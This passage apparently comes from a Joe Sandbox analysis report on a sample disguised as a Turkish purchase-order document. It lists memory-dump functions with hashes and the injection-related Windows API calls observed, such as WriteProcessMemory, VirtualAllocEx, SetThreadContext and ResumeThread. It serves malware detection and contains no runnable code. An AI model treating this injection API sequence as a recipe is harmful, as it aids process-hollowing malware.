                                                                                                      • Opcode Fuzzy Hash: f1df17d9fd237cc5c0bf541dce44f854c7be9b859791cd79b615483f29f1f17b
                                                                                                      • Instruction Fuzzy Hash: 2B41C171C00729CBEF25DFA9C88479EFBB5BF49304F20845AD408AB251DB756949CF94
                                                                                                      Function 07B77A68 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B77B00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 675a25db6a556ee85aa330b2b46b8d7cc6005fd07d39f85a0d84b94c856a4966
                                                                                                      • Instruction ID: f4484fa46af6f071aac53f596f78f5627688ce3e25f5d39604339f780c20bc35
                                                                                                      • Opcode Fuzzy Hash: 675a25db6a556ee85aa330b2b46b8d7cc6005fd07d39f85a0d84b94c856a4966
                                                                                                      • Instruction Fuzzy Hash: 39212BB59003499FDB14CFA9C885BEEBBF5FF48310F10842AE918A7240DB799954CBA5
                                                                                                      Function 07B77A70 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B77B00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: eab4c59b81d100b9e2f31af43b7127f8ef388c5fc0fe7f95c311502ecf0ca11e
                                                                                                      • Instruction ID: b1d5b14bd1671b982df597e691bfed64dea9accd1afc297ce16b50e4b5eec496
                                                                                                      • Opcode Fuzzy Hash: eab4c59b81d100b9e2f31af43b7127f8ef388c5fc0fe7f95c311502ecf0ca11e
                                                                                                      • Instruction Fuzzy Hash: 74212AB19003499FDB10CFA9C885BDEBBF5FF48310F10842AE918A7240CB799944CBA4
                                                                                                      Function 07B778D0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B77956
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: a1690fea4e6205a2d689f663e53f85b3afe545a0c2f653ed57ba8949c070454d
                                                                                                      • Instruction ID: 89ee9d770b5a8ef7ef09223c1b655c82a9791d911a19479b3f8e2b388467cfe8
                                                                                                      • Opcode Fuzzy Hash: a1690fea4e6205a2d689f663e53f85b3afe545a0c2f653ed57ba8949c070454d
                                                                                                      • Instruction Fuzzy Hash: AD2159B1D003099FEB14DFAAC4847EEBBF5EF88210F10842AD459A7340CB789945CBA5
                                                                                                      Function 0179DBA0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0179DB6E,?,?,?,?,?), ref: 0179DC2F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 6b95cead8dc77f996b39534f35ae8df6b2469f1dff206297cc81faa475d9e3c7
                                                                                                      • Instruction ID: f364099130899f0609c2fbdb5ff613e09b7ddf0b170ad2e42408a972604e987d
                                                                                                      • Opcode Fuzzy Hash: 6b95cead8dc77f996b39534f35ae8df6b2469f1dff206297cc81faa475d9e3c7
                                                                                                      • Instruction Fuzzy Hash: 442105B58002489FDF20CFAAE484ADEFFF9EB48310F14841AE914A7351D378A944CF64
                                                                                                      Function 07B77B5A Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B77BE0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 2b3a6bae06d32a3055b10dc1164aec750cd8b6b27e551f4c453f6d030102bdf2
                                                                                                      • Instruction ID: 23f14cb90888f815232f6fd4f8595c4ef7ffa36cdd77e94568b425fc8c92b699
                                                                                                      • Opcode Fuzzy Hash: 2b3a6bae06d32a3055b10dc1164aec750cd8b6b27e551f4c453f6d030102bdf2
                                                                                                      • Instruction Fuzzy Hash: 352107B18003499FDB14DFAAC840BEEBBF5FF48310F10842AE519A7240CB799940CBA5
                                                                                                      Function 0179D470 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0179DB6E,?,?,?,?,?), ref: 0179DC2F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 833193f09ad11f229cd71ddf51dd459694fe10912d31e57b0e714b14cc334588
                                                                                                      • Instruction ID: 7bf9bf40067b3459dfab9c283cd7deca6a5538824fdced19ef1ea2b35e110b92
                                                                                                      • Opcode Fuzzy Hash: 833193f09ad11f229cd71ddf51dd459694fe10912d31e57b0e714b14cc334588
                                                                                                      • Instruction Fuzzy Hash: C921B3B5D00248EFDB20CFAAD584AEEFBF5EB48310F14841AE914A7350D379A954CFA5
                                                                                                      Function 07B77B60 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B77BE0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 5165ab36a762f5a1f9d32973fffc71a5cda96e1544278a811612ec5285d0d739
                                                                                                      • Instruction ID: 92f2c918ca1525b5ab62382044877c8e7ee0dfaf6d8cd851b91af3697f9375e6
                                                                                                      • Opcode Fuzzy Hash: 5165ab36a762f5a1f9d32973fffc71a5cda96e1544278a811612ec5285d0d739
                                                                                                      • Instruction Fuzzy Hash: F021E9B1C003599FDB14DFAAC840BEEBBF5FF48310F10842AE559A7240CB799540CBA5
                                                                                                      Function 07B778D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B77956
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 5e3df9c035a71c865dc35d99ce54cfb4d10fd0b84b8b88bd940a93e95b40c6a3
                                                                                                      • Instruction ID: 148da87c8be37adde98454f37b0fc123d6bf73f0822d5003cbaea1cbd98a0658
                                                                                                      • Opcode Fuzzy Hash: 5e3df9c035a71c865dc35d99ce54cfb4d10fd0b84b8b88bd940a93e95b40c6a3
                                                                                                      • Instruction Fuzzy Hash: D02135B1D003099FEB14DFAAC484BEEBBF4EF48210F14842AD459A7240CB78A945CFA5
                                                                                                      Function 07B779A8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B77A1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 3b7a9ac73df19f2b9f078ed544efa711ea91648cfeac833f0a3419fea6bbc0b1
                                                                                                      • Instruction ID: b8a12cd407ab4d90997f78accce61e401e7f16ebe3d02264c2b2c4cce19ff57e
                                                                                                      • Opcode Fuzzy Hash: 3b7a9ac73df19f2b9f078ed544efa711ea91648cfeac833f0a3419fea6bbc0b1
                                                                                                      • Instruction Fuzzy Hash: C8115C769003489FEB24DFAAD844BEFBBF5EF48310F108419E515A7250CB759540CBA1
                                                                                                      Function 07B779B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B77A1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: c3c8da05a35d2d19c73113ee60a160448771538a7fc73f1cac665e43293f7973
                                                                                                      • Instruction ID: 811053486282a46ed592a5e5f23fe636d039de03b302d19558b20c8fc079b6e5
                                                                                                      • Opcode Fuzzy Hash: c3c8da05a35d2d19c73113ee60a160448771538a7fc73f1cac665e43293f7973
                                                                                                      • Instruction Fuzzy Hash: 3E113A728003499FEB24DFAAC844BEFBBF5EF48310F148419E515A7250CB759540CFA5
                                                                                                      Function 07B773E8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: 978ea13670920da7dcedc371826620a321e96dd2a6ef36c2a52c0a489ebb0a02
                                                                                                      • Instruction ID: 03bede61bafe21184edbe48a4ea2f1ab60e17647b9638c8c64af8b068588bbaa
                                                                                                      • Opcode Fuzzy Hash: 978ea13670920da7dcedc371826620a321e96dd2a6ef36c2a52c0a489ebb0a02
                                                                                                      • Instruction Fuzzy Hash: F41149B1D003488FEB24DFAAC4457EEFBF4EF48310F24881ED559A7640CA79A944CBA5
                                                                                                      Function 07B773F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: ff52a4b7b5b3feec1b91ffbc8e909ba3956c6ad0e98e050f13d48ba90321612e
                                                                                                      • Instruction ID: 61d385e3673a55f60570e6591dadb0f1feafd77b2d53596b9d399a5f121e1132
                                                                                                      • Opcode Fuzzy Hash: ff52a4b7b5b3feec1b91ffbc8e909ba3956c6ad0e98e050f13d48ba90321612e
                                                                                                      • Instruction Fuzzy Hash: E11128B1D003488FEB24DFAAC4457EEFBF4EF48310F24841AD519A7240CA79A944CBA5
                                                                                                      Function 07B76718 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B7AC15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: 163c7b10b7c5e15de2c4b0215ee167250a0a40b0d34b6bd13e70ec2d315080b8
                                                                                                      • Instruction ID: 4b7b50cde4c818f94a86c95305d2040f5f52ee9f536b3b3390df414f1eebb548
                                                                                                      • Opcode Fuzzy Hash: 163c7b10b7c5e15de2c4b0215ee167250a0a40b0d34b6bd13e70ec2d315080b8
                                                                                                      • Instruction Fuzzy Hash: C611E3B58002499FDB20DF9AC985BDEBBF8EB48310F10885AE514A7340C375A944CFA5
                                                                                                      Function 07B7ABB0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B7AC15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: 695b6ce3ae0812916ca88d964d7b2097650246174116baef25c5bb5aaeeffa19
                                                                                                      • Instruction ID: ad2f6f1b2f34accdb25e37420f18babc07b6659210fde55c7dedd89c314af5e7
                                                                                                      • Opcode Fuzzy Hash: 695b6ce3ae0812916ca88d964d7b2097650246174116baef25c5bb5aaeeffa19
                                                                                                      • Instruction Fuzzy Hash: BC11F5B58002499FDB20DF9AD985BDEBFF8EB48320F10881AE554A7740C375A984CFA5
                                                                                                      Function 0179B8C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0179B926
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 37a3907cfbe9be4f752f55bb2e5fe594a1c8581aec259114f82bb5a11dbfe43d
                                                                                                      • Instruction ID: 9cbe0522d8e2c4f761688f28481f452e64fdc2423790a60e1fb47ac7388cad9d
                                                                                                      • Opcode Fuzzy Hash: 37a3907cfbe9be4f752f55bb2e5fe594a1c8581aec259114f82bb5a11dbfe43d
                                                                                                      • Instruction Fuzzy Hash: DC1102B6C00649CFDB20CF9AE444ADEFBF4EF48220F10841AD458A7200C379A545CFA1
                                                                                                      Function 05DD938B Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0,Gq
                                                                                                      • API String ID: 0-2013397073
                                                                                                      • Opcode ID: 77e175a23d9b2e44af8a58b0b87f5bf1c22c6d147be705353e2926d9ef75f6b8
                                                                                                      • Instruction ID: 633f68796e7ad89bcb165ec16a34f078bf01dfe534d936d38afd62f957ce5f9a
                                                                                                      • Opcode Fuzzy Hash: 77e175a23d9b2e44af8a58b0b87f5bf1c22c6d147be705353e2926d9ef75f6b8
                                                                                                      • Instruction Fuzzy Hash: C151D331F006149FD714AF78D4597EDBBB2FB88300F0584A9E9819B396CE72AD4AC791
                                                                                                      Function 05DDC148 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hq
                                                                                                      • API String ID: 0-1594803414
                                                                                                      • Opcode ID: 7d8a0569495ae90c33285e94a9b581e758ce8532e362c84bc32d8ad96dcc6247
                                                                                                      • Instruction ID: 90261f572a77a2de8a9ba18962f163bad6d0809caf1fe7a0b493082ea8a08f3b
                                                                                                      • Opcode Fuzzy Hash: 7d8a0569495ae90c33285e94a9b581e758ce8532e362c84bc32d8ad96dcc6247
                                                                                                      • Instruction Fuzzy Hash: 9C51CF31A19608CBCB14CF68D9402AEFBB2FF85310F14856BE956DB2A1D739DC42C726
                                                                                                      Function 05DD9398 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0,Gq
                                                                                                      • API String ID: 0-2013397073
                                                                                                      • Opcode ID: 408d617c2292f8b0c064cb1e4dc2cb0c0205846f39f3ee84cb8dc0d5a475dc7b
                                                                                                      • Instruction ID: 20c3e94a5b4bd0baeac45fdbccb46e2997fb9001989a108038bba3f73d978285
                                                                                                      • Opcode Fuzzy Hash: 408d617c2292f8b0c064cb1e4dc2cb0c0205846f39f3ee84cb8dc0d5a475dc7b
                                                                                                      • Instruction Fuzzy Hash: CE51E330F006189FD714AF78D4597EEBBB2FB88300F0584A9E9819B385CE726D4AC781
                                                                                                      Function 075AD508 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: b9796d9dbb03d2d7dddb3d88830f7656eaa9a3f21fe8b6d34a46a0e9c6c18825
                                                                                                      • Instruction ID: 53361de43d1fa5186ce1af9ba766355cec7dffd65ba93ad73ec293b4db4602f3
                                                                                                      • Opcode Fuzzy Hash: b9796d9dbb03d2d7dddb3d88830f7656eaa9a3f21fe8b6d34a46a0e9c6c18825
                                                                                                      • Instruction Fuzzy Hash: 04516DB5B0035AAFDF15DFA8C484AEEBBF5FF48210F148466E909AB255D730D944CBA0
                                                                                                      Function 075A85A0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: _
                                                                                                      • API String ID: 0-701932520
                                                                                                      • Opcode ID: 1f93d32021402acfa9ada107957e4e8eebdca68fb226fd9ebfeb63ee2d1185bc
                                                                                                      • Instruction ID: a1b9bc7d1a96a7c3ebff3839a739e3c9925eca5cb6a2654f76635774e1c72d5e
                                                                                                      • Opcode Fuzzy Hash: 1f93d32021402acfa9ada107957e4e8eebdca68fb226fd9ebfeb63ee2d1185bc
                                                                                                      • Instruction Fuzzy Hash: D941FBB2600701AFD739CF69D9819DF77F9FF89250B004A29E446CB651E730F9068B91
                                                                                                      Function 075AD4F7 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: a9822d6e82801778253d2003231a061d5f79adcb1c14dc41e619b7a4b575adbf
                                                                                                      • Instruction ID: 4f78f77d6c2578b1bebff4b4e263f8f6607a125497e1ba1f85d31b924adb5761
                                                                                                      • Opcode Fuzzy Hash: a9822d6e82801778253d2003231a061d5f79adcb1c14dc41e619b7a4b575adbf
                                                                                                      • Instruction Fuzzy Hash: 9E21A3B5A01219AFCF11DF68C884AFE7BB5FF88210F048426F519DB215E730DA45CB90
                                                                                                      Function 075ABB90 Relevance: .6, Instructions: 582COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6d16f9f502368662da73958a4506dc1c79ffe22b640b6c788838a867cd49bde8
                                                                                                      • Instruction ID: d9a5b67c9ae9e344ba7c6b675ddf11dd409c4015c861f4b5c554f8541e432f1f
                                                                                                      • Opcode Fuzzy Hash: 6d16f9f502368662da73958a4506dc1c79ffe22b640b6c788838a867cd49bde8
                                                                                                      • Instruction Fuzzy Hash: 414217B4A00706DFC725DF68D584AAABBF2FF88310B558969E4469B751DB30EC42CF90
                                                                                                      Function 075AC2D0 Relevance: .5, Instructions: 526COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7fcb234cd7c87e3f18c660933ca7e657b1df0d22f8610195ee16f0fb467f8817
                                                                                                      • Instruction ID: 8700c6265c369221927cf420d29b12262d9883c643fbcf020397aa738b697d45
                                                                                                      • Opcode Fuzzy Hash: 7fcb234cd7c87e3f18c660933ca7e657b1df0d22f8610195ee16f0fb467f8817
                                                                                                      • Instruction Fuzzy Hash: F612B0B1A042469FDB24CB69D484BAEBBF6FF85210F14816BE5459B351CB30EC46CBA1
                                                                                                      Function 075A4800 Relevance: .4, Instructions: 411COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2fbcdc2ae1a69edc0f5063ecf70c08aa412ae80e20b70c32876300f13fcbdcc6
                                                                                                      • Instruction ID: f9700bc8bed7551ea8895b80774a4cd2d26b7a321e4a184770568f70dfd29657
                                                                                                      • Opcode Fuzzy Hash: 2fbcdc2ae1a69edc0f5063ecf70c08aa412ae80e20b70c32876300f13fcbdcc6
                                                                                                      • Instruction Fuzzy Hash: F8F15E70B002459FDB14DFA8D498AAEBBF6FF88310F14846AE9069B355DB34DC42CB90
                                                                                                      Function 075A8838 Relevance: .3, Instructions: 315COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
